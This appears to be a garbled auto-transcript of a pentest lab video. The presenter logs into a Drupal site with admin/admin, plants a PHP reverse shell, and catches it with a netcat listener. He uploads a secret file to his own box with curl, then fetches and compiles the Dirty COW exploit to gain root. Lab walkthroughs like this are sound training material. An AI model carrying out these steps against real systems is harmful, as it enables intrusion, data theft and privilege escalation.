Transferring Files Demo

00:01

Welcome to the file transfer lab demo. You can see I'm in a droop als site here. You can tell that because it's just powered by Drew Apple and also because a little dribble logo here. So sometimes it's as easy as guessing. So I'm going to do admin admin

00:17

and you can see I logged in as admin. Hello admin.

00:22

So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content

00:29

at a basic page.

00:31

I'm going to call this shell dot PHP

00:35

and I'm going to change this to PHP code

00:39

now. I need to figure out what shall I want to use. Well obviously we know it's PHP. You can see this is that said I was telling you about reb shells dot com.

00:48

I've already picked the pen test monkey show. I like this show.

00:52

And what you do is I've just added my I. P address and the port number.

00:56

It actually tells you what to do in your box here for the listener.

00:59

And I've changed my shell from the default been S. H. Two bin bash because I like bash shells better.

01:06

It's gonna copy this. I'm going to paste it here.

01:08

Yeah.

01:10

So what I need to get ready is I need to get a listener ready.

01:14

Net cat

01:15

An LEP 4444.

01:19

And we'll save this

01:23

and

01:26

we see if I hit preview.

01:30

Now I have my shell here. Dub dub, dub data. You can see this is no control job in shell. So let's have one to sue. Route.

01:40

It says must be run from a terminal. So now we know we have what I call a bad shell.

01:46

How do we make this a nicer shell?

01:49

So I told you about python, taxi, import P. T. Y.

01:53

Let's do that.

01:56

But you can see this has been S. H.

01:57

I like bash better but I'll show you what happens if you do Ben Shell.

02:01

So you just get the little dollar sign and not the nicer output.

02:06

You can of course change this

02:07

to bin bash

02:13

and there you go. Now if I wanted to sue route

02:16

now I asked me the password, obviously I don't know the root user's password.

02:21

Not yet.

02:23

So typically I'll go and figure out

02:27

who

02:29

who

02:30

is in here. And I see this Triple Pro which which users are in here I should say remember Cat at sea

02:38

at sea password.

02:40

And I see Drew Apple Pro.

02:43

So I'll change director to Drew People

02:46

Pro.

02:47

And then I'll see what files are in here. And I see this something called secret,

02:52

let's say when I get that file onto my Cali box,

02:57

what I'll do is I'll split my terminal vertically.

03:00

Mhm.

03:04

And I'm gonna use that simply should be put server. I told you I'll show you what it looks like a cat. It

03:13

it's a very small script. But I can now put things onto my Cali box. Whereas if I just did simple HDP server or HTTP server with python three, I can't put things onto my machine.

03:28

So let's do

03:30

python python two

03:34

And it's on 48,000.

03:36

So what I'll do on this size curl tete big t

03:42

secret

03:43

. And then my Cali box 1921681

03:50

228 8000.

03:53

And you can see that. I gotta crow request here.

03:58

And if I check my desktop

04:01

we can x. Out of here. Now

04:04

I see that I get secret

04:06

here.

04:09

So I put that on from from the dribble machine onto my machine with that server.

04:17

Now what I can do

04:21

is I can try to put a file from Cali onto this machine and if I do you name a, I see a kernel version and we'll talk about this morning in colonel exploits

04:34

but I know that this is vulnerable to dirty cow

04:38

as you can see already have dirty cow down here.

04:42

So typically what I do is go to the temp directory because I know it's globally readable, writable and execute Herbal

04:48

and I'll use curl http 1921681228 8000.

04:58

Remember this is on the desktop and dirty cows on the desktop. Dirty

05:02

cow dot c

05:05

output. Dirty

05:08

you can even whatever I want. Dirty see

05:12

and now I see to get requests on the right

05:15

and I see that that was downloaded.

05:18

So if I open this, I said I like to look at the comments.

05:24

It should tell me how to compile it. So I see here G ccP thread dirty. See output. Dirty.

05:32

So I'll try that here

05:42

and um ahmad plus X.

05:46

Dirty

05:49

and then I will

05:53

and our new password

05:57

and you can see it should have overwritten

06:00

the etc. Password file to have this fire fart user

06:05

in it as as the root user.

06:15

So some sometimes you'll notice that um, you may not get an output with these, these colonel exploits. There we go. Now we see something.

06:23

Yeah.

06:25

Great. So now we see that it's done check etc. Pastor to see if the new user was created.

06:30

So now I can do sue. Fire,

06:36

fire fart

06:41

and my password of fire.

06:44

And now we see I am the root user.

06:47

So that gives you some idea of how I both get files. I mean I showed you many examples. This is that was just one was setting up that simple http. Put server. But you saw how I could put files onto my machine.

07:01

You saw how I transferred from a bad shell where I couldn't use su

07:09

to using python and importing P. T. Y.